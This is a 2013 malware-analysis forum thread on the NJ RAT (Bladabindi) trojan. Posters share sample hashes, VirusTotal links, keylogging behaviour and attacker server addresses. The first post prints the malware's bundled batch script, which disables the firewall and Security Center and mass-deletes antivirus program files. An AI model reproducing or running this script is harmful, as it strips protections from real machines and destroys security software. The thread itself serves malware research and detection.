Win32/Bladabindi (NJ RAT)

Forum for analysis and discussion about malware.
User avatar
EP_X0FF
Global Moderator
Posts: 4872
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Win32/Bladabindi (NJ RAT)

Post by EP_X0FF » Thu May 30, 2013 2:12 am

MMPC description http://www.microsoft.com/security/porta ... adabindi.G

SHA256: e2dee10881ceafddf3fc8fbe16c4fc1b14898c52e34b985cd7b0ef7b531e38df
SHA1: 5af0c48c88da182d337c60c0ba1f0dd067c93df6
MD5: 4f80ed5be19fdf11d1fb27240640ba40

https://www.virustotal.com/en/file/e2de ... 369879627/

script-kiddie trash

batch included

Code: Select all

echo offnet stop “Security Center”netsh firewall set opmode mode=disabledel E-*del av*del fire*del anti*del spy*del bullguarddel PersFwdel KAV*del UfseAgnt*del Spy*del ZONEALARMdel SAFE***del OUTPOST*del nv*del nav*del F-*del cle*del BLACKICEdel def*del kav*del avg*del ash*del aswupdsvdel ewid*del guard*del guar*del gcasDt*del msmp*del mcafe*del mghtmldel msiexecdel *safe*del zap*del zauinstdel upd*del zlclien*del minilogdel cc*del norton*del norton au*del ccc*del npfmn*del loge*del nisum*del issvcdel tmp*del tmn*del pcc*del cpd*del pop*del pav*del padmindel panda*del avsch*del sche*del syman*del *virus*del realm*del sweep*del scan*del ad-*del safe*del avas*del norm*del offg*del /Q /F %ProgramFiles%\alwils~1\avast4\*.*del /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\******del /Q /F %ProgramFiles%\kasper~1\******del /Q /F %ProgramFiles%\trojan~1\******del /Q /F %ProgramFiles%\f-prot95\*.*del /Q /F %ProgramFiles%\tbav\*.datdel /Q /F %ProgramFiles%\avpersonal\*.*del /Q /F %ProgramFiles%\Norton~1\*.*del /Q /F %ProgramFiles%\Mcafee\*.*del /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*del /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*del /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*del /Q /F %ProgramFiles%\Norton~1\Trend Micro\*.*del /Q /F %ProgramFiles%\Norton~1\*.*del /Q /F %ProgramFiles%\avgamsr\******del /Q /F %ProgramFiles%\avgamsvr\******del /Q /F %ProgramFiles%\avgemc\******del /Q /F %ProgramFiles%\avgcc\******del /Q /F %ProgramFiles%\avgupsvc\******del /Q /F %ProgramFiles%\grisoftdel /Q /F %ProgramFiles%\nood32krn\******del /Q /F %ProgramFiles%\nood32\******del /Q /F %ProgramFiles%\nod32\******del /Q /F %ProgramFiles%\nood32\******del /Q /F %ProgramFiles%\kav\******del /Q /F %ProgramFiles%\kavmm\******del /Q /F %ProgramFiles%\kaspersky\*.*del /Q /F %ProgramFiles%\ewidoctrl\******del /Q /F %ProgramFiles%\guard\******del /Q /F %ProgramFiles%\ewido\******del /Q /F %ProgramFiles%\pavprsrv\******del /Q /F %ProgramFiles%\pavprot\******del /Q /F %ProgramFiles%\avengine\******del /Q /F %ProgramFiles%\apvxdwin\******del /Q /F %ProgramFiles%\avira\******del /Q /F %ProgramFiles%\panda software
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration

rough_spear
Posts: 163
Joined: Mon Oct 18, 2010 4:46 pm
Location: India

Re: Win32/Bladabindi (NJ RAT)

Post by rough_spear » Fri Aug 09, 2013 8:13 pm

Hi All,

This malware has an excellent capability of key logging.After execution it drops file java.exe in %temp%

and created java.exe.tmp file where it actually stores all the key strokes from user.

MD5 - 30E363C63AB1BA3BA87AD281E31CA223

VT link - https://www.virustotal.com/en/file/ed87 ... /analysis/

Regards,

rough_spear. ;)
You do not have the required permissions to view the files attached to this post.

rough_spear
Posts: 163
Joined: Mon Oct 18, 2010 4:46 pm
Location: India

Re: Win32/Bladabindi (NJ RAT)

Post by rough_spear » Sat Aug 17, 2013 11:16 am

Hi All,

One more sample file of this malware.

MD5 - BD1D660819EE54457794F31B8AB1FDE2

VT link - https://www.virustotal.com/en/file/4128 ... 376738064/

Regards,

rough_spear. ;)
You do not have the required permissions to view the files attached to this post.

rough_spear
Posts: 163
Joined: Mon Oct 18, 2010 4:46 pm
Location: India

Re: Win32/Bladabindi (NJ RAT)

Post by rough_spear » Sat Aug 17, 2013 12:32 pm

It seems that Bladabindi is on the prowl, one more sample.

MD5 - A47C6E1861C6935CA98185C8D5C3795A

VT link - https://www.virustotal.com/en/file/0273 ... 376742132/

Regards,

rough_spear. ;)
You do not have the required permissions to view the files attached to this post.

User avatar
hx1997
Posts: 101
Joined: Sat Apr 07, 2012 12:16 am

Re: Win32/Bladabindi (NJ RAT)

Post by hx1997 » Tue Aug 20, 2013 2:27 am

8x Backdoor:MSIL/Bladabindi
You do not have the required permissions to view the files attached to this post.

TwinHeadedEagle
Posts: 72
Joined: Mon Aug 27, 2012 6:59 am
Contact:

Re: Win32/Bladabindi (NJ RAT)

Post by TwinHeadedEagle » Wed Sep 04, 2013 10:17 pm

Backdoor:MSIL/Bladabindi.AA

Dropper

https://www.virustotal.com/en/file/f35a ... /analysis/
You do not have the required permissions to view the files attached to this post.

TwinHeadedEagle
Posts: 72
Joined: Mon Aug 27, 2012 6:59 am
Contact:

Re: Win32/Bladabindi (NJ RAT)

Post by TwinHeadedEagle » Thu Sep 05, 2013 8:09 am

Another dropper, very low detection

https://www.virustotal.com/en/file/99ea ... /analysis/
You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1671
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Win32/Bladabindi (NJ RAT)

Post by Xylitol » Sun Dec 01, 2013 11:32 pm

https://www.virustotal.com/en/file/84ee ... 385916159/
njrat, fud.
My VM, something weird happened.
Image
You do not have the required permissions to view the files attached to this post.

patriq
Posts: 108
Joined: Fri Jun 28, 2013 8:11 pm
Contact:

Re: Win32/Bladabindi (NJ RAT)

Post by patriq » Mon Dec 02, 2013 8:49 pm

Xylitol wrote:https://www.virustotal.com/en/file/84ee ... 385916159/
njrat, fud.
My VM, something weird happened.
Image
Thats pretty funny.

Fuck anti-VM, they just gonna start putting anti-"Xyl" detection soon. Lol. :D

Good stuff as usual man.


That java.exe sample was hosted at hxxp://silver13.net/
A few more samples from the same server, attached.
Low detection rates..still some MSIL .net crap

Code: Select all

sub.exe
560FFF8CCFA8AE563F00483659659F78

dex.exe
C5A4103DF0A10F19916CCCBB0E989D14	

doc.exe
3262D5E2855FEF2C9263A47DEE2AC3A5

(from VxVault)
thought that dex.exe (C5A4103DF0A10F19916CCCBB0E989D14) would be a Dexter sample, since you caught him on a POS machine before..but looks like "SecureDll.dll" loading into IE address space..I think its just formgrabber/keylogger ability. Anyone confirm?

probable spot where key strokes are stored

Code: Select all

HKEY_CURRENT_USER\Software\HelperSolutions Software
"%System%\strokes.log"
notes about the servers this "hacker" uses in this campaign:

Code: Select all

silver13.net.		158.58.173.181 - RIPE-ERX NL
silver13.no-ip.biz.	197.15.207.77  - Agence Tunisienne Internet
You do not have the required permissions to view the files attached to this post.

User avatar
rkhunter
Posts: 1155
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Contact:

Re: Win32/Bladabindi (NJ RAT)

Post by rkhunter » Thu Jan 16, 2014 8:12 am


Post Reply